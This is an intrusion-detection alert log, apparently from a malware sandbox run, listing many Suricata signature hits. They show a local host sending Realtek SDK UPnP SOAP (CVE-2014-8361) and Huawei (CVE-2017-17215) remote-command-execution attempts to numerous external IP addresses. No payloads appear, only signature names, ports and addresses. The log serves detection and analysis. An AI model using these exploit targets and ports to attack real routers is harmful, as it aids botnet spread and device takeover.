                                                07/20/24-23:07:31.848052TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24556452869192.168.2.14169.204.117.167
                                                07/20/24-23:05:52.494675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3445052869192.168.2.1479.20.2.158
                                                07/20/24-23:05:59.227912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3731852869192.168.2.1446.189.159.251
                                                07/20/24-23:05:37.971787TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4000052869192.168.2.14140.200.78.210
                                                07/20/24-23:05:56.266001TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613976452869192.168.2.14216.188.116.154
                                                07/20/24-23:05:37.612113TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23774252869192.168.2.1478.147.130.95
                                                07/20/24-23:05:57.187454TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613837052869192.168.2.1483.130.210.209
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083837215192.168.2.14197.127.169.149
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105437215192.168.2.1441.154.38.234
                                                07/20/24-23:05:33.861088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189237215192.168.2.14125.218.223.230
                                                07/20/24-23:06:00.123303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23731652869192.168.2.14173.165.96.254
                                                07/20/24-23:05:56.818967TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4504052869192.168.2.1499.108.70.8
                                                07/20/24-23:05:59.312502TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5716852869192.168.2.14154.170.187.222
                                                07/20/24-23:06:00.444049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3427852869192.168.2.14186.25.143.158
                                                07/20/24-23:06:13.581565TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4708652869192.168.2.1459.97.251.204
                                                07/20/24-23:05:57.161619TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24842252869192.168.2.14211.68.211.55
                                                07/20/24-23:06:01.449184TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23986052869192.168.2.14144.116.63.138
                                                07/20/24-23:05:40.365777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4597052869192.168.2.14180.90.7.162
                                                07/20/24-23:05:57.229188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4204852869192.168.2.1419.228.35.122
                                                07/20/24-23:05:37.452253TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25403252869192.168.2.14179.192.77.243
                                                07/20/24-23:06:08.940741TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4613252869192.168.2.14220.38.3.62
                                                07/20/24-23:05:37.453720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24136452869192.168.2.1470.251.155.61
                                                07/20/24-23:06:01.215644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3292652869192.168.2.14150.247.197.160
                                                07/20/24-23:05:45.403074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808837215192.168.2.14157.86.221.236
                                                07/20/24-23:05:40.395251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787452869192.168.2.1449.83.27.219
                                                07/20/24-23:05:50.479091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347237215192.168.2.1467.230.220.76
                                                07/20/24-23:05:47.525551TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4370852869192.168.2.1445.228.151.222
                                                07/20/24-23:06:01.465127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5850452869192.168.2.14150.6.47.69
                                                07/20/24-23:05:57.417957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5826452869192.168.2.1490.174.188.55
                                                07/20/24-23:05:57.437168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25594452869192.168.2.1437.248.27.96
                                                07/20/24-23:05:58.995248TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615992052869192.168.2.1442.106.20.3
                                                07/20/24-23:05:58.403603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615176652869192.168.2.14104.173.87.38
                                                07/20/24-23:05:39.331620TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615583452869192.168.2.1459.45.134.101
                                                07/20/24-23:05:35.367234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614850452869192.168.2.14125.97.107.120
                                                07/20/24-23:05:52.728679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3910452869192.168.2.14212.158.194.40
                                                07/20/24-23:05:45.403074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888437215192.168.2.14157.229.174.120
                                                07/20/24-23:05:59.302912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23640452869192.168.2.14195.241.186.3
                                                07/20/24-23:05:35.201174TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615579852869192.168.2.14125.66.54.149
                                                07/20/24-23:05:36.431738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614780252869192.168.2.1468.40.200.159
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876237215192.168.2.14157.74.250.224
                                                07/20/24-23:06:34.157855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5426052869192.168.2.14103.13.164.163
                                                07/20/24-23:06:09.635095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5089652869192.168.2.14136.78.52.143
                                                07/20/24-23:05:35.988385TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613875252869192.168.2.1438.30.142.71
                                                07/20/24-23:05:39.050437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081837215192.168.2.14157.67.182.150
                                                07/20/24-23:07:28.154823TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24858252869192.168.2.14122.206.97.7
                                                07/20/24-23:06:19.828183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615235452869192.168.2.14110.51.53.108
                                                07/20/24-23:05:35.348979TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4930852869192.168.2.1481.167.63.48
                                                07/20/24-23:05:35.896111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5290852869192.168.2.1417.189.220.248
                                                07/20/24-23:06:54.482380TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23318252869192.168.2.14210.242.56.65
                                                07/20/24-23:05:39.876249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3440452869192.168.2.14174.146.134.66
                                                07/20/24-23:05:47.108564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624837215192.168.2.14197.211.64.143
                                                07/20/24-23:05:37.458829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5662452869192.168.2.14141.117.5.138
                                                07/20/24-23:05:47.105578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701437215192.168.2.1441.89.89.168
                                                07/20/24-23:06:07.806552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4219252869192.168.2.1493.193.45.65
                                                07/20/24-23:05:36.339999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293237215192.168.2.14197.251.112.30
                                                07/20/24-23:05:58.093158TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615166052869192.168.2.1423.28.207.2
                                                07/20/24-23:05:52.557906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25537852869192.168.2.145.107.169.199
                                                07/20/24-23:05:56.783840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614468852869192.168.2.14140.147.162.187
                                                07/20/24-23:05:59.119988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5448652869192.168.2.14213.153.92.60
                                                07/20/24-23:05:58.382027TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3461452869192.168.2.14134.186.183.71
                                                07/20/24-23:05:40.467316TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24463852869192.168.2.1453.127.213.152
                                                07/20/24-23:05:58.592016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614227652869192.168.2.1467.24.164.252
                                                07/20/24-23:06:02.417792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4169652869192.168.2.14107.64.165.241
                                                07/20/24-23:05:58.394422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613961852869192.168.2.14135.7.73.21
                                                07/20/24-23:05:56.993750TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615133852869192.168.2.14195.123.119.195
                                                07/20/24-23:05:59.102064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614561052869192.168.2.1438.8.232.207
                                                07/20/24-23:05:57.606361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5626652869192.168.2.14221.205.117.86
                                                07/20/24-23:05:35.598269TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027052869192.168.2.1427.21.93.45
                                                07/20/24-23:06:01.160884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613921852869192.168.2.1441.186.134.72
                                                07/20/24-23:06:01.604739TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25934052869192.168.2.14140.29.146.170
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791837215192.168.2.1499.80.150.223
                                                07/20/24-23:05:40.478948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4239852869192.168.2.14126.4.218.232
                                                07/20/24-23:06:12.329747TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614702252869192.168.2.14160.71.233.132
                                                07/20/24-23:06:02.327173TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24853252869192.168.2.1471.152.254.101
                                                07/20/24-23:05:37.445622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26096252869192.168.2.1424.245.120.74
                                                07/20/24-23:05:50.542034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070037215192.168.2.14197.186.4.250
                                                07/20/24-23:05:36.354373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786437215192.168.2.1441.112.8.124
                                                07/20/24-23:05:40.433285TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25031852869192.168.2.14159.176.16.130
                                                07/20/24-23:05:48.787750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055837215192.168.2.14197.111.230.214
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876237215192.168.2.14157.74.250.224
                                                07/20/24-23:05:44.796964TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614183052869192.168.2.1466.110.133.249
                                                07/20/24-23:05:35.364015TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3615252869192.168.2.14203.171.109.95
                                                07/20/24-23:05:59.587077TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25809452869192.168.2.1413.58.163.5
                                                07/20/24-23:05:33.830272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423037215192.168.2.14157.18.39.4
                                                07/20/24-23:05:35.929180TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615743452869192.168.2.1491.85.138.225
                                                07/20/24-23:06:01.192858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6095452869192.168.2.14218.31.236.194
                                                07/20/24-23:06:15.395080TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24807652869192.168.2.14133.227.108.255
                                                07/20/24-23:05:59.247850TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613439452869192.168.2.1496.223.224.178
                                                07/20/24-23:06:05.124335TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5839452869192.168.2.14145.108.231.36
                                                07/20/24-23:05:47.014311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4111437215192.168.2.1441.119.148.20
                                                07/20/24-23:05:50.515352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726237215192.168.2.1460.221.65.154
                                                07/20/24-23:05:33.852857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4454437215192.168.2.14197.70.47.135
                                                07/20/24-23:05:58.696476TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615888452869192.168.2.1447.0.16.112
                                                07/20/24-23:05:45.376608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016637215192.168.2.1441.239.164.123
                                                07/20/24-23:05:57.148116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5631852869192.168.2.14113.250.68.242
                                                07/20/24-23:06:12.617233TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614851252869192.168.2.1425.75.108.18
                                                07/20/24-23:05:58.090071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26032252869192.168.2.14162.39.12.155
                                                07/20/24-23:06:08.528852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4339852869192.168.2.14166.90.41.67
                                                07/20/24-23:05:42.257817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410837215192.168.2.14157.158.149.99
                                                07/20/24-23:05:58.227664TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4330052869192.168.2.1464.167.73.71
                                                07/20/24-23:05:57.342606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23839252869192.168.2.14222.83.92.112
                                                07/20/24-23:05:36.055523TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613864452869192.168.2.1420.40.190.208
                                                07/20/24-23:05:35.504398TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614027052869192.168.2.14129.37.83.27
                                                07/20/24-23:05:47.352326TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5586052869192.168.2.14135.180.161.252
                                                07/20/24-23:05:37.549791TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25178852869192.168.2.14182.202.245.171
                                                07/20/24-23:05:57.210836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614547652869192.168.2.14113.163.150.34
                                                07/20/24-23:07:03.123324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4245652869192.168.2.1497.184.161.137
                                                07/20/24-23:07:25.723282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615997252869192.168.2.14137.240.101.183
                                                07/20/24-23:05:57.234632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5310852869192.168.2.14132.216.98.22
                                                07/20/24-23:05:47.499623TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614668252869192.168.2.14213.18.175.220
                                                07/20/24-23:05:56.086217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535037215192.168.2.14197.154.77.201
                                                07/20/24-23:05:37.450149TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24009252869192.168.2.14223.250.141.64
                                                07/20/24-23:06:54.833146TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24306252869192.168.2.1486.230.221.175
                                                07/20/24-23:05:57.568828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615339052869192.168.2.1495.50.102.157
                                                07/20/24-23:06:04.568777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4981652869192.168.2.14217.15.90.132
                                                07/20/24-23:05:46.333210TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613964452869192.168.2.14196.229.8.153
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740237215192.168.2.14150.97.187.67
                                                07/20/24-23:05:57.851101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5258252869192.168.2.1499.63.100.144
                                                07/20/24-23:06:26.800191TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615725052869192.168.2.14191.42.118.223
                                                07/20/24-23:05:36.021915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5467852869192.168.2.1457.144.122.58
                                                07/20/24-23:05:57.804757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614565452869192.168.2.1480.193.144.183
                                                07/20/24-23:05:38.933433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810237215192.168.2.14157.55.5.162
                                                07/20/24-23:05:35.536547TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708052869192.168.2.1472.58.64.100
                                                07/20/24-23:06:13.512424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3989652869192.168.2.14188.244.73.220
                                                07/20/24-23:05:57.811975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3285052869192.168.2.1418.150.67.241
                                                07/20/24-23:05:33.863090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930637215192.168.2.14157.155.124.136
                                                07/20/24-23:05:36.355198TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5935452869192.168.2.14207.229.195.229
                                                07/20/24-23:05:39.680161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5062237215192.168.2.14197.119.68.120
                                                07/20/24-23:06:00.572173TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24030652869192.168.2.14203.174.131.227
                                                07/20/24-23:07:01.613026TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615428252869192.168.2.1457.38.35.10
                                                07/20/24-23:05:57.114018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5747652869192.168.2.14160.180.47.240
                                                07/20/24-23:06:00.620754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511237215192.168.2.14192.243.188.52
                                                07/20/24-23:06:16.692772TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614596252869192.168.2.14105.234.90.169
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632237215192.168.2.14157.196.112.31
                                                07/20/24-23:05:57.109755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4709452869192.168.2.14128.70.217.129
                                                07/20/24-23:06:00.451606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24537252869192.168.2.1495.161.141.86
                                                07/20/24-23:06:06.434054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3495052869192.168.2.14209.246.221.148
                                                07/20/24-23:06:13.705655TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5753252869192.168.2.1496.131.9.180
                                                07/20/24-23:05:47.281162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614106052869192.168.2.14179.97.101.3
                                                07/20/24-23:07:23.347168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5568452869192.168.2.1460.97.101.84
                                                07/20/24-23:05:33.859349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316437215192.168.2.1441.93.186.26
                                                07/20/24-23:05:36.252094TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614148652869192.168.2.14199.49.205.148
                                                07/20/24-23:05:56.069521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658237215192.168.2.14157.13.195.107
                                                07/20/24-23:06:00.265687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4289852869192.168.2.14152.22.234.187
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440437215192.168.2.1441.100.110.197
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503037215192.168.2.14157.159.160.223
                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157837215192.168.2.14197.28.221.234
                                                07/20/24-23:06:09.557113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5519052869192.168.2.1498.26.18.228
                                                07/20/24-23:06:11.296189TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613977652869192.168.2.14126.128.13.90
                                                07/20/24-23:05:40.330485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24149652869192.168.2.1451.130.138.196
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523237215192.168.2.1441.171.135.230
                                                07/20/24-23:06:26.043403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26021852869192.168.2.1417.149.245.24
                                                07/20/24-23:05:56.696605TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615920652869192.168.2.14106.31.240.76
                                                07/20/24-23:05:35.815974TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5683652869192.168.2.14193.85.31.138
                                                07/20/24-23:06:27.421231TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24292452869192.168.2.14178.190.0.107
                                                07/20/24-23:05:40.326250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24934852869192.168.2.1496.95.169.154
                                                07/20/24-23:05:57.161619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6090052869192.168.2.14146.82.123.202
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5285037215192.168.2.1441.17.10.71
                                                07/20/24-23:05:37.497829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25721452869192.168.2.14199.202.13.130
                                                07/20/24-23:05:39.035942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253237215192.168.2.14197.116.241.24
                                                07/20/24-23:05:56.994181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3638652869192.168.2.14193.66.175.30
                                                07/20/24-23:05:56.421313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243037215192.168.2.14197.192.81.94
                                                07/20/24-23:06:27.648191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3371052869192.168.2.1499.160.107.32
                                                07/20/24-23:05:36.574959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4454637215192.168.2.14197.59.10.121
                                                07/20/24-23:05:35.256504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3619452869192.168.2.14148.30.198.131
                                                07/20/24-23:05:58.821284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24467252869192.168.2.1443.139.9.185
                                                07/20/24-23:06:09.588800TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614731852869192.168.2.14112.6.123.48
                                                07/20/24-23:06:15.999787TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3624052869192.168.2.1497.53.99.115
                                                07/20/24-23:05:37.465013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4869252869192.168.2.14192.216.183.201
                                                07/20/24-23:05:46.088778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905837215192.168.2.14157.235.233.243
                                                07/20/24-23:05:34.659617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620837215192.168.2.14197.143.99.76
                                                07/20/24-23:06:00.128631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5209452869192.168.2.1472.144.78.222
                                                07/20/24-23:05:56.086216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814837215192.168.2.14197.123.204.246
                                                07/20/24-23:05:56.334607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615364252869192.168.2.1484.68.245.96
                                                07/20/24-23:06:16.164913TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25929052869192.168.2.14164.66.171.183
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611637215192.168.2.14157.184.79.183
                                                07/20/24-23:05:39.039093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956837215192.168.2.14157.122.231.251
                                                07/20/24-23:06:00.581239TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002852869192.168.2.1443.68.128.224
